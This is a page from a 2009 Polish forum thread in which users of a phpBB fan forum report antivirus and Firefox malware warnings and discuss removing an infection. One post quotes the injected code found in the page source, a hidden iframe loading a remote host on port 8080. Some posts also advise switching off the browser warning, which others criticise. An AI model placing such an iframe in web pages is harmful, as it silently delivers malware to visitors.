Utwórz nowy wątek Odpowiedz w wątku  [ Posty: 84 ]  Przejdź na stronę Poprzednia strona  1, 2, 3, 4, 5  Następna strona
UWAGA WIRUS NA FORUM ! 
Autor Wiadomość
Avatar użytkownika

Dołączył(a): Pt cze 24, 2005 11:45 am
Posty: 2637
Lokalizacja: Ostrow Wlkp.
 
Post 
Obrazek

Ten komunikat mozna prosto wylaczyc:

1. menu Narzedzia -> Opcje...

2. ikonka BEZPIECZENSTWO

3. Odznaczamy "Powiadom o obecnosci na witrynie stwarzajacej zagrozenia"

To pozycja zdajesie druga od gory.


Pt cze 19, 2009 4:18 am Zobacz profil

Dołączył(a): So paź 25, 2008 15:23 pm
Posty: 90
 
Post 
ale tu chyba nie chodzi o 'odznaczenie' skutku tylko o wyleczenie przyczyny...


Pt cze 19, 2009 8:22 am Zobacz profil
Avatar użytkownika

Dołączył(a): Cz wrz 11, 2008 15:21 pm
Posty: 46
Lokalizacja: śląsk
 
Post 
było wyzej już ale to dla adminów http://www.searchengines.pl/Infekcja-hi ... 24457.html ,niech zabezpieczą forum ,tu pare narzedzi :)


Pt cze 19, 2009 13:10 pm Zobacz profil WWW
Avatar użytkownika

Dołączył(a): Cz sty 22, 2009 15:13 pm
Posty: 211
Lokalizacja: Amongst The Ruins
 
Post 
Errata, chodzilo o Windows Defendera, nie Bitdefendera, takze nic tu sie z niczym nie gryzie. Tak czy owak przejechalem komputer Kasperskim online i nic nie wykryl . Wniosek - Opera rox. Ale teraz na wszelki wypadek pisze z Browser Appliance i zdejmuje kominiare.


Pt cze 19, 2009 14:19 pm Zobacz profil
Avatar użytkownika

Dołączył(a): Pt maja 15, 2009 10:35 am
Posty: 248
Lokalizacja: warszawa
 
Post 
komunikat sie pojawia tylko w firefoxie w operze wsio hula


Pt cze 19, 2009 14:34 pm Zobacz profil
Avatar użytkownika

Dołączył(a): N wrz 21, 2008 22:21 pm
Posty: 24
Lokalizacja: Poznań
 
Post 
Wydaje mi się, że pojawił się na forum jakiś dodatek JavaScriptowy, który jest zaliczany do grona podejrzanych - i to nie przez Firefoxa, ale przez Googla (FF tylko mówi, co mó powiedział Google).

http://safebrowsing.clients.google.com/ ... /index.php

Na tej stronie można się dowiedzieć paru szczegółów.

Jestem za usunięciem problemu, nie za wyłączaniem ostrzeżenia. Mogę pomóc w analizie problemu.


Pt cze 19, 2009 17:47 pm Zobacz profil WWW
Avatar użytkownika

Dołączył(a): So sie 30, 2008 21:37 pm
Posty: 635
 
Post 
pojawił się: JS.Downloader

oraz

Cytuj:
<iframe src="http://torrentoreactor.net:8080/index.php" width=100 height=0 style="visibility: hidden"></iframe>


w dolnej części źródła strony


Pt cze 19, 2009 19:00 pm Zobacz profil WWW

Dołączył(a): So kwi 18, 2009 18:38 pm
Posty: 263
Lokalizacja: Olsztyn
 
Post 
Mam Noda32,gdy dzis chciałem wejsc na forum wywalił mi trojana...heee


Pt cze 19, 2009 19:41 pm Zobacz profil
Avatar użytkownika

Dołączył(a): Cz maja 21, 2009 21:22 pm
Posty: 23
Lokalizacja: nirvana...
 
Post 
A mi zwykły avaścik wyje, że wykrył wirusa, ale tylko na stronie głównej. Na innych nic się nie dzieje.


Pt cze 19, 2009 20:02 pm Zobacz profil

Dołączył(a): Śr paź 13, 2004 21:31 pm
Posty: 4
Lokalizacja: glivice
 
Post wirus?
witam drodzy moderatorzy
zrobicie coś z wirusami na stronie głownej? kaspersky się broni ale jak długo
pozdrawiam


Pt cze 19, 2009 21:12 pm Zobacz profil
Avatar użytkownika

Dołączył(a): Śr lip 09, 2003 8:00 am
Posty: 695
Lokalizacja: Gdańsk
 
Post 
Wirus usuwany był już wielokrotnie, serwer też był dodatkowo zabezpieczany - ale to cholerstwo ciągle włazi :?


Pt cze 19, 2009 22:45 pm Zobacz profil WWW
Avatar użytkownika

Dołączył(a): So sie 30, 2008 21:37 pm
Posty: 635
 
Post 
logi serwera, dostępu -> może tam znajdziecie chociaż jakieś poszlaki

ukryte "iframe" zawierają, zawierały adresy stron-> blokada dostępu do forum przez IP, zawsze coś na początek

najlepiej to przejście na najnowszą wersję phpBB, w starym dużo luk było i nadal jest (w końcu ta wersja silnika została wydana niecałe 8 lat temu)


Pt cze 19, 2009 23:17 pm Zobacz profil WWW
Avatar użytkownika

Dołączył(a): Pn lip 28, 2003 20:12 pm
Posty: 4176
Lokalizacja: Chomiczówka
 
Post 
Czy mozna jakos zlikwidowac blokade z Firefox'a?


So cze 20, 2009 17:37 pm Zobacz profil
Avatar użytkownika

Dołączył(a): So sie 30, 2008 21:37 pm
Posty: 635
 
Post 
przejście na IE tam nie ma żadnych blokad, IE jest przyjazny "internetowym śmieciom" :lol:

a w firefox -> pierwszy post @Szamana u góry


So cze 20, 2009 18:25 pm Zobacz profil WWW
Avatar użytkownika

Dołączył(a): Cz sty 22, 2009 15:13 pm
Posty: 211
Lokalizacja: Amongst The Ruins
 
Post 
safebrowsing.clients.google.com napisał(a):
Robot Google po raz ostatni odwiedził tę witrynę 2009-06-20, a ostatni raz podejrzana treść została w niej wykryta 2009-06-17.

Czy to znaczy, że już jest bezpieczno? Poza tym, sorry za sarkazm, ale jak słyszę te pytania jak "zlikwidować blokadę" i wujków dobrych rad polecających przejście na dziurawe przeglądarki lub wyłączenie zabezpieczeń to nie wiem czy śmiać się czy płakać. Jak już ktoś koniecznie chce ignorować ostrzeżenia, to przecież w Firefoksie jak wyskakuje ten czerwony alert jest opcja z wyraźnym napisem w języku polskim "zignoruj to ostrzeżenie", no litości. Ale jak na coś przechodzić z Firefoksa to raczej na Operę - ma lepsze statystyki bezpieczeństwa i najszybciej łatane dziury. Na strony ewidentnie niebezpieczne najlepsze jest Browser Appliance: http://www.vmware.com/appliances/directory/80 czyli przeglądarka w odrębnym od Windowsa wirtualnym środowisku.


Pn cze 22, 2009 0:17 am Zobacz profil
 
Post 
czyli co...??
juz po wirusie???


Wt cze 23, 2009 21:13 pm
aDMinistrator

Dołączył(a): Wt lip 08, 2003 22:53 pm
Posty: 2581
 
Post 
na razie tak


Wt cze 23, 2009 22:44 pm Zobacz profil
Avatar użytkownika

Dołączył(a): Śr maja 09, 2007 0:29 am
Posty: 130
Lokalizacja: another state of mind
 
Post 
Ufff....dwa dni bez forum to za wiele ;)


Śr cze 24, 2009 1:45 am Zobacz profil

Dołączył(a): So paź 25, 2008 15:23 pm
Posty: 90
 
Post 
widzę, że chyba największe 'obrazenia' odnioslam - bo skonczyło się formatem :/ - chyba, że to zbieg okoliczności.. ale po 3 latach należało sie :)


Cz cze 25, 2009 11:29 am Zobacz profil
Avatar użytkownika

Dołączył(a): Pt lis 21, 2003 14:51 pm
Posty: 1264
Lokalizacja: Białystok
 
Post 
i mi po wizycie na forum system odpalał się tylko w trybie awaryjnym, ale gruntowny skan systemu pomógł, a przy okazji zrezygnowałem z avasta, który nie zabezpieczył kompa przed atakiem


Cz lip 02, 2009 11:03 am Zobacz profil
Wyświetl posty nie starsze niż:  Sortuj wg  
Utwórz nowy wątek Odpowiedz w wątku  [ Posty: 84 ]  Przejdź na stronę Poprzednia strona  1, 2, 3, 4, 5  Następna strona


Kto przegląda forum

Użytkownicy przeglądający ten dział: Brak zidentyfikowanych użytkowników i 1 gość


Nie możesz rozpoczynać nowych wątków
Nie możesz odpowiadać w wątkach
Nie możesz edytować swoich postów
Nie możesz usuwać swoich postów

Szukaj:
Skocz do:  
Powered by phpBB © phpBB Group.
Designed by (c) 2002 Sven Plaggemeier www.depechemode.de, modified by PFDM Team